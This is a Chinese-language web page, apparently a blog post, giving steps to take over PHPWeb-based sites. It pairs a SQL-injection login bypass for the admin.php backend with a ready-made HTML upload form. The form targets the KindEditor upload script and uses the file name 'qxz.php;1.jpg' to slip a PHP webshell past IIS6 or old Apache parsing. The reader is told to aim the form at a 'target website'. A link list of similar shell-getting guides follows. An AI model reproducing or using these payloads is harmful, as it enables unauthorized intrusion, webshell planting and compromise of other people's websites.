首先登录后台admin.php(默认后台admin.php)

有的phpweb网站存在万能密码登录

帐号密码都输入:admin 'or '1'='1直接登录

登录后台管理系统后,然后把下面的文件保存为xxx.html,修改action,把www.xxx.com 改成你的目标网站地址。

<form name="uploadForm" method="post" enctype="multipart/form-data"action="http://www.xxx.com/kedit/upload_cgi/upload.php">
<input type="text" name="fileName" value="qxz.php;1.jpg" />
<input type="hidden" name="attachPath" value="news/pics/" />
<input type="file" name="fileData" size="14" /></td>
<input type="submit" name="button" value="确定" />
</form>

然后选择你的马儿再上传

上传后如果为iis6,就点击查看源码就可以找到马儿的路径了。

PS:qxz.php;1.jpg这样的文件是允许上传的,只要服务器是IIS6就拿到webshell,低版本的apache可以试着重命名为qxz.php.jpg

phpweb后台拿shell方法相关推荐

  1. phpweb后台拿shell简单方法

    关于phpweb后台拿shell简单方法. 首先登录后台admin.php 登录后台管理系统后,然后把下面的文件保存为xxx.html,修改action,把 www.xxx.com 改成你的目标网站地 ...

  2. 网站后台拿shell方法总结

    今日带给大伙的都是些手艺上的总结,有些人老问经验怎么来的,这个即是经验,盼愿大伙都能成为脚本妙手. 动网上传漏洞,信任大伙拿下不少肉鸡吧.可以说是动网让upfile.asp上传文件过滤不严的漏洞昭然全 ...

  3. Ecshop后台拿shell方法总结

    方法一:龙儿心发明的,版本未定,估计都行. 进入后台-系统设置-Flash播放器管理 可以上传任意文件. [includes/fckeditor /editor/filemanager/connect ...

  4. php用户管理拿shell,PHPWEB网站管理系统后台拿shell

    前几天贫道拿一个IDC的分站 看到了PHPWEB 于是默认的进入了后台 不过进去之后拿shell难住了 妹夫的 去百度一下 那个方法失效 版本: V1.4.3 / 20100925 无奈中 于是在刁科 ...

  5. 帝国 loginjs.php,帝国cms 6.6 后台拿shell

    时间:2013-02-27来源:源码库 作者:源码库 文章热度: ℃ 漏洞作者: 付弘雪 提交时间: 2013-01-21 公开时间: 2013-01-21 漏洞类型: 文件上传导致任意代码执行 简要 ...

  6. 后台得到webshell方法大汇总

    动网上传漏洞,相信大家拿下不少肉鸡吧.可以说是动网让upfile.asp上传文件过滤不严的漏洞昭然天下,现在这种漏洞已经基本比较难见到了,不排除一些小网站仍然存在此漏洞.在拿站过程中,我们经常费了九牛 ...

  7. joomla后台拿shell

    整理了joomla后台拿shell的几种方法,不解释,至于怎么进后台晓得也不晓得- 第一种 官网下载joomla中文包com_zmaxappstore.zip,解压修改install.xml 添加&l ...

  8. 后台拿shell全集

    正学习后台拿Shell的方法,今天碰巧在网上看见得到后台拿shell的汇总全集,很不错的总结,分享了!版主给个精华吧!   今天带给大家的都是些技术上的总结,有些人老问经验怎么来的,这个就是经验,希望 ...

  9. 渗透测试常用反弹shell方法(如何渗透测试反弹shell?)-Linux篇(゚益゚メ) 渗透测试

    文章目录 相关博客 反弹shell介绍 常用反弹方式 NetCat(NC)反弹 正向NC 反向NC Telnet反弹 正向shell 反向shell OpenSSL Curl 相关博客 Linux信息 ...

最新文章

  1. 自创数据集,用TensorFlow预测股票教程 !(附代码)
  2. oracle 错误2 启动服务提示找不到指定文件_Weblogic中间件创建文件权限问题解决...
  3. mysql数据结构参考书籍_mysql数据结构相关
  4. OSG的垃圾回收机制
  5. 微软MS10-046漏洞的利用
  6. 人工智能的前景:更高智慧的体的诞生
  7. 远程登录telnet 连接失败的解决方法
  8. PHP pathinfo() 函数【获取文件后缀】
  9. Python官方开发文档(中文版)
  10. 智和网管平台SugarNMS网络安全解决方案
  11. sap服务器的文件管理,SAPPLM 文档管理介绍
  12. EasyAdmin极简社区论坛系统源码
  13. go:循环冗余校验(CRC)(附完整源码)
  14. yum的配置文件yum.conf详解
  15. JVM 之 JDK安装与配置
  16. 数据堂将出席盖世汽车2021第三届汽车智能座舱与用户体验大会
  17. 理解sparse coding
  18. 【Typora】添加水印
  19. hawk -- pacemaker web GUI
  20. JVM帝国一日游【穿越小说】

热门文章

  1. https 证书过期检测
  2. CODEVS——T 1005 生日礼物
  3. Android 中屏幕点击事件的实现2
  4. html滚动背景色没了,css背景颜色不显示怎么解决
  5. PromptCLUE:大规模多任务Prompt预训练中文开源模型
  6. Pencil+4 for Maya 三渲二风格化角色全流程教学带素材高清
  7. css3 文字走马灯,前端开发:css3实现文字首尾衔接跑马灯
  8. DJI Flight Simulator 大疆飞行模拟器 安装教程
  9. 自己打造的首款小程序——抖印小助手专业去短视频水印
  10. 弘辽科技:新手开淘宝网店的七大攻略